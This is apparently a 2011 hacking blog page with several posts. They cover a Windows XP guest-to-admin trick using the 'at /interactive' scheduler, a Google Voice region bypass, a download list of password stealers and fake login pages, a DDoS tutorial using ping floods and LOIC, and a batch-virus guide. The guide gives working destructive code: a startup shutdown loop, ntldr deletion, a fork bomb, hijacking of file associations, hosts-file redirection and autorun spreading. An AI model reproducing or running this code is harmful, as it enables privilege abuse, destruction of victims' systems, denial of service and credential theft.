Tuesday, 6 September 2011

Get administrative privileges from your guest account







Get administrative privileges from your guest account


I think this hack will defiantly helpful for the collage students. College students generally don’t have Administration privileges on lab computers to copy or install applications where they use this hack to gain some real stuff done on PC.


Vulnerability:


Windows command line task scheduler supports interactive mode which works somewhat same as sudo -i or su -i command in Linux/UNIX the only problem is that it does not ask you for password. This vulnerability is patched up in further versions of Windows than XP and works fine even in XP-3.


Procedure:


Press win+r or open run type cmd hit enter and open command prompt and type


c:\>time
and note the time, time will be presented in 24 hour clock format. Note this time.
Now open “Task Manager” by typing


“c:\>taskmgr”
now from processes and end explorer.exe .


Now type,


c:\>at [(time displayed in 24 hour clock format)+2 minutes] /interactive cmd.exe


for example

c:\>time
The current time is: 0:27:11.68
Enter the new time:


c:\>taskmgr


c:\>at 0:29:00:00 /interactive cmd.exe

Now type c:\>exit


And wait for two minutes. After two minutes command prompt will open in interactive mode with all administrative privileges without asking you for password. Now run any command from it it’ll run with full administrative privileges so that you can even install programs and applications in system. So type “explorer.exe” in cmd and use system with administrative privilege even when you are in guest account.


Countermeasure: Disable command prompt for guest account.


By the way no college can ever disable command prompt because practicals are done over it, so guys get your stance and enjoy freedom.


Enjoy…….





How to Send free SMS Worldwide?











Most of you might have heard about Google Voice which provides great free VOIPservice within USA. However, Google Voice is not free for people outside USA. When you try to visit Google Voice home page from anywhere but USA, it says that Google Voice is not available in your country. Today, we bring you a hack that will let you useGoogle Voice to send and receive free SMS anywhere in the world.


Requirements:


  • A smart Phone (iPhone, Blackberry or other smart phones)

  • Internet connection

  • Two Google Voice Accounts



Steps


If you have a smart phone you can download the google voice application for it. If Google does not have an application for your device you can still use web version which you can access from your phone’s web browser.


You will need a Google voice Account . If you are outside USA you can use a proxy such as hidelinkonline to createGoogle Voice account. Remember that you will need one account for each person that you want to send (or receive) SMS to (from). Google Voice comes with a USA phone number that you have the option to choose from host of numbers.


Once you have the accounts set up you can login to your phone using this information. The good thing is that thisapplication works on GPRS too. Moreover, you can use GPRS without the special data plan for iPhone.


After you have logged into your application successfully, you can send SMS to any number in USA and Canada. Since all your friends now have a Google Voice Number you can sms them and they can reply back on your Google voice number. Your friends or partners need not be within the same country. They can be anywhere in the world. This is totally free SMS service for you

Best Hacking Tools 85 in 1 new 2010 Download







The Best collection of Hacking tools available. Includes MSN and Yahoo hack tools.


- HOTMAIL HACKING


- YAHOO HACKING


- MSN FUN TOOLS


- FAKE SCREENS/PAGES


- OTHER HACKING TOOLS


FUN TOOLSPage 1:


MSN Chat Monitor And Sniffer


MSN Password Retriever


MSN Hacker DUC


Head **** HotMail HAck


HotMail Hacker XE Edition


HotMail HAck


HotMAil Hacker


MSN Passwords


MSN Flooder


MSN Sniffer


MSN SPY Lite


HotMail Hacker Gold


HotMail HAcker Final


Give me Ur Pass


HotMail Brute Forcer


MSN PAssword Finder


MSN Password Grabber


Hack MSN Password


Hack HotMAil Evolution


MAgic Password Sender


MSN Locker


HotMail Killer


Hot Freeze


MessenPass


HotMAil Hack !


Ice Cold Reload


HotMail Killer 2


Nuke MSNPage 2:


Yahoo Messenger Login Screen


MSN Messenger 7 Login Screen


MSN Messenger 5 Login Screen


MSN Messenger 4.6 Login Screen


HotMail Login Screen


Fake Web Pages 2


Fake Eeb Pages 1


AOL Killer


Fake Login HotMail


B-S Spy


Saria Fake LoginsPage 3:


Yahoo Password Retrieval


Yacam


Yahoo Cracker


Yahoo Booster


Yahoo Hack!


Yahoo Password Stealer


S-H Yahoo Password SenderPage 4:


NetWork Password Recovery


Net BIOS Name Scanner


FTP Password Hacker


Cable Modem Sniffer


Port Listening XP


Blue Port Scanner


www 2 IP


XP Killer


Sniff Password


Port Scanner


Fast Resolver


Domain Scan


Whois Domain


NetRes View


PHPbb Defacer


Angry IP Scanner


FTP Brute ForcerPage 5:


Hook Tool Box


Smart HAck UpLoader


Remote Anything


Post Sage


PHPbb AttackerPage 6:


Skinner


MSN Bomber Man


Ultimate Nick PopUpz


MSN 7 Universal Patcher


Emoticons Creator


MSN Picture Crawler


Anti Status Bomb


MSN Detector


Multi MSN Loader


Kitle


Protect Lithium


Tray It!


MSN Block Checker


MSN Auto Responder


MSN Virus CleanerDownload and Enjoy hacking….




Cracking – Hacking – Assembling – Disassembling Undercoverd + Tools













Going beyond the issues of analyzing and optimizing programs as well as creating the means of protectinginformation, this guide takes on the programming problem of how to go about disassembling a program with holes without its source code. Detailing hacking methods used to analyze programs using a debugger and disassembler such as virtual functionslocal and global variables, branching, loops, objects and their hierarchy, and mathematical operators, this guide covers methods of fighting disassemblers, selfmodifying code in operating systems, and executing code in the stack.


* Hacking and Cracking


Hacking for Dummies Apr 2004.pdf


CD Cracking Uncovered Protection Against Unsanctioned CD Copying.chm


eBook Hacking Maximum SecurityA Hackers Guide to Prote.pdf


eBook OReilly Hacking TCP IP Security.pdf


Excel Hacks 100 IndustrialStrength Tips & Tools.chm


Hacker Disassembling Uncovered (2003).chm


Hackers Beware (2001).pdf


Hackers Delight.chm


Hacking Firewalls And Networks How To Hack Into Remote Computers.pdf


Hacking Hack Proofing Your Network Internet Tradecraft.pdf


Hacking The Art Of Exploitation (2003).chm


Hacking The Art Of Exploitation.chm


Hacking Access to Other Peoples Systems Made Simple.pdf


hacking exposed chapter16 hacking the internet user.pdf


Hacking for Beginers.rar


Hacking Knoppix.chm


HackingMaximum Security A Hackers Guide To Protecting Your Internet Site and Network.pdf


Hardware Hacking Have Fun While Voiding Your Warranty.pdf


PC Hacks 100 IndustrialStrength Tips & Tools.chm


PDF Hacks 100 IndustrialStrength Tips & Tools.chm


Retro Gaming Hacks Tips & Tools For Playing The Classics.chm


WiFoo The Secrets Of Wireless Hacking.chm


* Hackers Black Book


2_Hackers BlackbookEng.pdf


Ebooks The Hackers Blackbook (1).pdf


Hackers Black Book.rar


Hackers Blackbook.pdf


hackers_blackbook.pdf



Download :










DDoS Attack – A life lesson Tutorial





Introduction


This is a Windows & Linux tutorial. You can still do it in MAC and Solaris with an exe emulator or a virtual box or something….


Recent events that have gone on in my favorite website(darksunlight.com) have inspired me to inform people of the dangers of DDoS.
Like the art of hacking by “Social Engineering”, their is no anti-virus for DDoS. The only cure is knowledge. Informing the people is the only way to keep it from happening to them. Or a nice firewall^^


I know their are a lot more ways to DoS than are shown here, but i’ll let you figure them out yourself. If you find any mistake in this tutorial please tell me^^


What is “DDoS”?


Denial of Service attacks(or Distributed Denial of Service attacks[DDoS]) is a form of organized attacks with the goal of taking down a server by overloading it. Often with useless information(packets) being sent to the server in massive amounts.


In-fact about a year ago I found one of my websites was accidentally DoS-ing darksunlight.com(i use darksunlight as my webhost) because my PHP script made an infinite loop that sent the same information over and over and over into darksunlight’s SQL databases. This one page took this EXTREMELY powerful server down twice in less than a minute. That site has since been deleted.
That story demonstrates that it does not take more than a simple “error” in your code to overload a server.


Keep in mind that altough spreading knowledge is my main goal, performing DDoS attacks is indeed a federal crime in the US.
It is also an international offence and will be punished according to the local laws of the individual’s country.


But enough talk. I will now show you a quick example of a DoS attack of sorts you can do on your local computer.


Sample
Keep in mind that this is NOT a real DoS attack, but rather an example to visualize how a DoS works.


We will take down YOUR computer.


Step 1
Open up notepad, mousepad, or your favored equivalent.


Step 2
Type in this simple batch command
a
start
goto a


Step 3
Save as “dossample.bat” making sure you select “All files” from the “File Type” dialog.


Step 4
Run that sucker, but save your work first, as this will crash even the best computers in a matter of minutes, even seconds.


What did you learn from this?
Observe how the file rapidly replicates itself, opening a new CMD right after it opens another.
An infinite loop has been created that has filled the RAM with useless and massive amounts of CMDs(or Terminals for you Unix folk)


DDoS attacks work much the same way, except instead of replicating an infinite number of CMDs, they send information(packets) to the server over and over and over again until the server crashes.


What information you may ask?
Anything. Your login name, your ‘online’ status, a new comment, the number of views on a video, your new high score. Absolutely any information that could be resent a massive amount of times to the same server.


Next we will be discussing the simplest form of DDoS.


DDoS by Ping Flood


Please note that I will be pinging my Localhost. You should too.


Perhaps one of the simplest ways to DoS is by using the ‘ping’ command built into most operating systems, including all windows distributions, and Linux.


Step 1
Start up your server. Mine is apache, but that is beside the point, the server type does not matter. If it has an IP address, it can be pinged.


Step 2
Type in the ping command



Code:


ping -t -a -l 65500 localhost



Step 3
Press enter and watch it ping the localhost over and over until
your server crashes, or you get tired of waiting for it to crash.


Since most modern servers can take the stress of the ping flood, you will need to get all your friends to help you ping to bring your server down. Or even slow it down.


Command Explained
ping – tells the computer to ping a server
-t – It will continue to ping the server until the command is closed, or stopped.
-a – Resolves the adress to host names.
-l – Size.


By default the ping will send 32bytes of data to the server, so you must change this to a bigger number. The maximum is 65,500bytes, so that is what we used.


If you send a server any number higher than 65,500bytes it will instantly crash. This is called “Ping of Death”.
Like any other thing with the suffix “of Death” it is very dangerous, rare, and hard to accomplish indeed.


DDoS by Reloading
Something as simple as reloading a page can take down a server if done enough times.


Step 1
Make a page that lets you submit forms. Method=’GET’ is better than method=’POST’ for this, but both will work.
(If you do not understand step 1, just find a page that lets you sumbit information, like a new comment or upload a picture)


Step 2
Fill out the forms and submit


Step 3
Reload the page
If the page uses the POST method your browser will display a dialog asking if you are sure you want to resend the information, or something to that effect. Simply click “Continue” or “OK”.(see now why GET is better?)


Step 4
Keep reloading until server is down.


Their are many addons and tools that allow you to autoreload a page. It is a matter of googleing for them. They are widely available and free.


I have just created a program that allows you to Auto-refresh a page using IE. If you are interested please download from:
Host: Darksunlight | Size: 9kb | Format: .zip ultra compressed | Platform: Windows


This method is very primitive as you can see, but it is probably the best way to DDoS.


Low-Orbit Ion Cannon
LOIC (Low Orbit Ion Cannon) is an app, written in C# and developed by praetox, that was used by Anonymous during Project Chanology. It attempts to DoS the target site by using all its bandwidth, sending TCP, UDP, or HTTP requests to the server until it crashes.



Step 1
Download and extract LOIC


Step 2
Open LOIC.exe and fill out the required information.


[Image: loiic.png]
Don’t be tricked by my theme, i use XP, not Vista or 7.


IP or URL = IP or URL that you wish to DoS


TCP / UDP message = information being sent, just write something random. Or leave it as default.


Port = Server’s port


Method = Server’s Method, leave as TCP if unknown
If you are gonna try to take down a website then use HTTP


Speed = set to “<= faster”


Threads = How many users it should simulate, the higher the number the faster it will crash. Set to 10,000. Note that this might make your computer lag, if so, set to a lower amount.


Step 3
Click on “IMMA CHARGIN MAH LAZER”
This starts the DoS attack.


Now you know what a DDoS attack is and you can work to better protect your self.


Their are still many other ways to attack a server, but these are the basics of DoS.
Protect your servers xD


Like any web developer I hope you will use this information for the good.
Sadly i know that their are those amongst us that are, even now as we read this, plotting how to do harm with this information.
To those, I flip the bird.


You may use this tutorial, in part or as a whole, for whatever purpouse.
-Druidtton of Darksunlight.

How dangerous could a batch file be?







How dangerous could a batch file be?


Hi users, today we could just you give the codes to paste in
notepad and ask you to save files with extension .bat and   your deadly batch viruses would be ready.
But instead of that, we have focused on making the basics of batch files clear
and developing the approach to code your own viruses.


What are Batch Files?


Lets begin with a simple example , Open your command prompt
and change your current directory to ‘desktop’ by typing ‘cd desktop’ without
quotes.


Now type these commands one by one


1. md x  //makes directory ‘x’ on desktop


2. cd x  // changes current directory to ‘x’


3. md y // makes a directory ‘y’ in directory ‘x’


Lets do the same thing in an other way. Copy
these three commands in notepad and save file as anything.bat


Now just double click on this batch file and the same work
would be done , You will get a folder ‘x’ on your desktop and folder ‘y’ in it.
This means the three commands executed line by line when we ran the batch
file


So a batch file is simply a text containing series of
commands which are executed automatically line by line when the batch file is
run.





What can batch viruses do ?





They can be used to delete the windows files, format data,
steal information, irritate victim, consume CPU resources to affect performance,
disable firewalls, open ports, modify or destroy registry and for many more
purposes.


Now lets start with simple codes, Just copy the code to
notepad and save it as anything.bat (I am anything you wish but extension must
be bat and save it as ‘all files’ instead of text files).





Note: Type ‘help’ in command prompt to know about some
basic commands and to know about using a particular command , type
‘command_name /?’ without quotes.





1.  Application Bomber


@echo off // It instructs to hide the commands when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop


This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and ofcourse affecting performance.


2. Folder flooder


@echo off
:x
md %random% // makes directory/folder.
goto x


Here %random% is a variable that would generate a positive no. randomly. So this code would make start creating folders whose name can be any random number.


3.User account flooder


@echo off
:x
net user %random% /add //create user account
goto x


This code would start creating windows user accounts whose names could be any random numbers.


3.Shutdown Virus


copy anything.bat “C:\Documents and
Settings\Administrator\Start Menu\Programs\Startup”


copy anything.bat “C:\Documents and Settings\All Users\Start
Menu\Programs\Startup”   //these two commands will copy the
batchfile in start up folders (in XP)


shutdown -s -t 00  //this will shutdown the computer in
0 seconds


Note
:
 Files in Start up folder gets started automatically when
windows starts .  You should  first two lines of  code in every
virus code so that it would copy itself in startup folder. Start up folder path
in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup


Everytime the victim would start the computer, the batch
file in start up would run and shutdown the computer immediately. You can
remove this virus by booting the computer in Safe Mode and deleting the batch
file from Start Up folder.


4. Deleting boot files


Goto C drive in Win XP , Tools->Folder Option->View


Now Uncheck the option ‘Hide operating system files’ and
check option ‘Show hidden files and folders’. Click apply


Now you can see the operating system files. There is a one
file ‘ntldr’ which is boot loader used to boot the windows.


Lets make a batch file to


delete this file from victim’s computer and the windows will
not start then.


attrib -S -R -H C:\ntldr   // -S,-R,-H to clear system file attribute, read only
attribute , hidden file attribute respectively


del
ntldr    //delete ntldr file


After running this batch file , system will not reboot and a
normal victim would definitely install the windows again.


5. Fork Bomb


%0|%0  //Its percentage zero pipe percentage zero


This code creates a large number of processes very quickly
in order to saturate the process table of windows. It will just hang the
windows .




6. Extension Changer


@echo off


assoc .txt=anything // this command associates extension
.txt with filetype anything.


assoc .exe=anything


assoc .jpeg=anything


assoc .png=anything


assoc .mpeg=anything




Every extension is associated with a file type like extension
‘exe’ is  is associated with filetype ‘exefile’. To see them, just enter
command ‘assoc’ in command prompt.


Above code changes the association of some
extensions to filetype ‘anything’ (means u can write anything) which obviously
doesn’t exist. So all exe (paint,games,command prompt and many
more),jpeg,png,mpeg files wouldn’t open properly.


7.  DNS Poisoning


There is a file called ‘hosts’ located at
c:\windows\system32\drivers\etc. We can place a website and an IP in front of
it. By doing this, we want our web browser to take us to host located at that
IP when that website name would be entered. I mean request to resolve IP of
website is not sent to Domain Name Server(DNS) if the name of website in hosts
file.


@echo off


echo xxx.xxx.xxx.xxx www.anything.com >

C:\windows\system32\drivers\etc\hosts   //this command prints or add
xxx.xxx.xxx.xxx. www.anything.com in hosts file.


Replace xxx.xxx.xxx.xxx  and www.anything.com with IP
address and website of your choice. You can take/redirect victim to any host
located at specific IP when he wud try to log on to specific website or u can
simply block any website by entering its name and any invalid IP address.


Viruses we just coded


Note : Most of the batch viruses are simply undetectable
by any anitiviruses


Tip : Coding good viruses just depends on the DOS
commands you know and logic you use.





Limitations of Batch Viruses -:


1.Victim can easily read the commands by opening batch file
in notepad.


2.The command prompt screen pops up,it alerts the victim and
he can stop it.


To overcome these limitations,we need to convert these batch
files into executable files that is exe files.


first download this Batch To Exe coverter with the help of goggling .


After running converter ,  open the batch file virus ,
Save as exe file , set visibility mode ‘Invisible application’ , than just
click on compile button.


You can  use other options as per your
requirement.


Spreading batch viruses through pen drive -:


Step 1.


Open notepad and write


[autorun]


open=anything.bat


Icon=anything.ico


Save file as ‘autorun.inf’


Step 2. Put this ‘autorun.inf’ and your actual batch virus
‘anything.bat’ in pendrive .


When the victim would plug in pen drive,the autorun.inf will
launch anything.bat and commands in batch file virus would execute.


Enjoy…….